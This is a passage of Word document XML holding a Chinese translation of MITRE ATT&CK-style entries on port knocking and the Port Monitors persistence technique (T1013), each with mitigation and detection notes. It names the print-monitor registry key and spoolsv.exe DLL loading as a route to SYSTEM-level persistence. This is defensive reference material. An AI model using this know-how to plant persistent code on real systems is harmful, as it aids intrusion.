            <w:r w:rsidRPr="009C653B">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3431B152" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716C59B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BA09BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需要</w:t>
            </w:r>
            <w:r>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501445BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御网络服务扫描</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C458B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65A87CAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="0BC428B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C66918" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66918">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>端口敲击是防御者和对手用来隐藏开放端口以阻止访问的成熟方法。要启用端口，攻击者会在打开端口之前发送一系列具有特定特征的数据包。通常，这一系列数据包包括尝试连接到预定义的封闭端口序列，但可能涉及异常标志、特定字符串或其他唯一特征。序列完成后，打开端口通常由基于主机的防火墙完成，但也可以通过自定义软件实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5A6724" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C66918" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66918">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对于侦听端口的动态打开以及启动与不同系统上的侦听服务器的连接，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66918">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>已备受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>关注</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66918">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33C38B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可以通过不同方法对信号数据包进行观察以触发通信。一种手段，最初由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Cd00r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>实现，是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>libpcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>库来嗅探有问题的数据包。另一种方法利用原始套接字，使恶意软件能够使用已打开供其他程序使用的端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE181E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1869"/>
        <w:gridCol w:w="7867"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="16EB9D08" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1869" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C40CBDC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7867" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0CD9B46E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="3F6EB6BE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F3F0CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络</w:t>
            </w:r>
            <w:r>
              <w:t>流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1469F1D2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>可通过使用有状态防火墙来缓解此技术的某些变体，具体取决于其实现方式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15656C5F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB27B7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004C3F3B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3F3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>记录发送到系统或从系统发送的网络数据包，查找不属于已建立流的无关数据包</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3F3B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F81F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口监控</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="30D13FCB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D994BD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1013</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFEC3DB" w14:textId="6B79A79B" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AC791B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17AEE4C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8AF2AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8C5E32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，动态链接库监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00065000" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D37CD72" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66892AC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373AE85D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用设置端口监视器，设置在动态链接库启动时加载它。此动态链接库可以位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并在启动时由打印后台处理程序服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>spoolsv.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> spoolsv.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程也在系统级别权限下运行。或者，如果权限允许将动态链接库的完全限定路径名写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以加载任意动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F109FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18C5FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00534C40" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547052A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00534C40" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F9F0A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00534C40" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00534C40">
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2542AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00534C40" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00534C40">
        <w:t>WSD</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C1DC0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会使用此技术在启动时加载恶意代码，这些代码即便在系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后仍存在并且以系统权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E1111" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65316322" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B504C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584AA58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87D553" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00534C40" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>spoolsv.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00534C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载的异常动态链接库。</w:t>
      </w:r>
    </w:p>
